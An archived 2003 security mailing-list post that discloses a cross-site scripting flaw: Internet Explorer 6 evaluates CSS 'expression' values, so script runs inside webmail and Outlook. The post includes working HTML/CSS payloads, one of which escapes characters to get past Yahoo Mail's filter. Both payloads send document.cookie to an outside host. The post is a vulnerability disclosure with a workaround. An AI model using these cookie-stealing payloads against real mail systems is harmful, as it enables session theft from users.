| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030929142846.GA21331@c9x.org>
From: j at pureftpd.org (Jedi/Sector One)
Subject: Webmails (including Yahoo) + IE 6 = XSS
Internet Explorer has an useless feature that allows evaluation of
Javascript expressions in style sheets through the "expression" keyword.
It allows execution of arbitrary javascript as soon as an HTML message is
read in older versions of Outlook and in most webmail systems filtering
<script> tags :
<html>
<body>
<style type="text/css">
h1 {
height:expression(alert(42));
background-image:expression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>
Yahoo! mail has a filter against this, that replaces "expression" with
"_expression".
Unfortunately, this filter is easy to bypass using escaped characters that
are valid CSS and that are properly handled by IE 6.
<html>
<body>
<style type="text/css">
h1 {
he\ight:e\xpression(alert(42));
bac\kground-image:e\xpression('url(http://example.org/'+document.cookie+')');
}
</style>
<h1>...</h1>
</body>
</html>
Workaround until all existing webmail software is fixed (...) : disable
Javascript and/or use any other web browser that focuses on W3C compliance
instead of implementing insecure bloat.
--
__ /*- Frank DENIS (Jedi/Sector One) <j@...Networks.Com> -*\ __
\ '/ <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a> \' /
\/ <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a> \/
Powered by blists - more mailing lists